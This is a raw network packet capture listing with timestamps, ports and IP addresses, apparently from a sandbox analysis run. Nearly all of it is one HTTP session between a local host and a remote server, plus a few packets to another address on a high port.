Sep 3, 2024 17:13:21.917969942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917982101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917982101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917994976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918019056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918019056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918029070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918267965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918278933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918288946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918294907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918306112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918317080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918323994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918329000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918339014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918343067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918355942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918368101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918376923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918376923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918400049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918415070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918502092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918557882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918656111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918673038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918679953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918689966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918701887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918715954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918728113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918735027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918742895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918752909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918764114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918770075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918781996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918793917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918801069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918801069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918807030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918818951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918848991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.918972015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918982983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.918994904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919018984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919049978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919127941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919138908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919150114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919164896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919176102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919187069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919198036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919198036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919203997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919218063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919219017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919262886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919290066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919292927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919306040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919317007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919328928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919341087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919353962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919365883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.919379950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919405937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.919405937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.996356010 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:21.998528004 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:22.005394936 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.010586977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010606050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010618925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010658979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010756969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010757923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010771036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010783911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010795116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010797977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010807991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010811090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010834932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010873079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010915995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010926008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010942936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010952950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010961056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010971069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010979891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.010982037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.010993958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011003971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011017084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011029005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011029005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011034012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011070967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011070967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011250019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011266947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011288881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011333942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011342049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011423111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011432886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011442900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011452913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011471033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011523962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011534929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011544943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011555910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011569977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011573076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011585951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.011596918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.011643887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.012377024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.012387991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.012406111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.012417078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.012434006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.012437105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.012437105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.012510061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014648914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014658928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014669895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014681101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014691114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014700890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014704943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014720917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014733076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014743090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014750957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014759064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014771938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014781952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014781952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014781952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014801025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014837980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014837980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014868975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014880896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014892101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014908075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014919996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014925003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014925003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.014933109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014944077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014955997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.014957905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015006065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015086889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015161037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015172005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015181065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015191078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015204906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015233040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015233040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015280962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015292883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015302896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015314102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015326023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015328884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015364885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015364885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015597105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015608072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015616894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015628099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015639067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015641928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015655994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015667915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015674114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015677929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015690088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015692949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015701056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015713930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.015726089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015726089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015764952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.015909910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016012907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016024113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016033888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016048908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016061068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016063929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016063929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016072989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016083956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016084909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016098976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016110897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016141891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016195059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016235113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016258001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016272068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016309023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016341925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016395092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016415119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016427040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016438007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016467094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016467094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016498089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016673088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016689062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016700029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016710997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016720057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016746998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016769886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016823053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016885042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.016947985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016958952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016969919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.016992092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017019033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017023087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017030954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017040968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017059088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017072916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017076015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017085075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017102957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017117977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017159939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017172098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017191887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017204046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017215014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017235994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017260075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017273903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017301083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017327070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017394066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017410040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017421007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017431974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.017437935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017447948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.017467022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108233929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108247995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108259916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108270884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108280897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108314991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108342886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108346939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108386040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108397961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108403921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108407974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108419895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108433008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108458042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108458042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108581066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108593941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108599901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108609915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108614922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108624935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108647108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108680964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108680964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108711958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108725071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108742952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108760118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108760118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108778000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108788013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108789921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108808041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108819962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108824968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108831882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.108844042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108863115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108890057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.108993053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109003067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109061003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109177113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109188080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109199047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109230042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109245062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109416962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109427929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109436989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109447956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109466076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109477043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109487057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109500885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109507084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109507084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109507084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109519005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109527111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109532118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.109558105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.109587908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111475945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111488104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111500978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111526012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111618042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111738920 CEST	80	49730	52.212.52.84	192.168.2.8
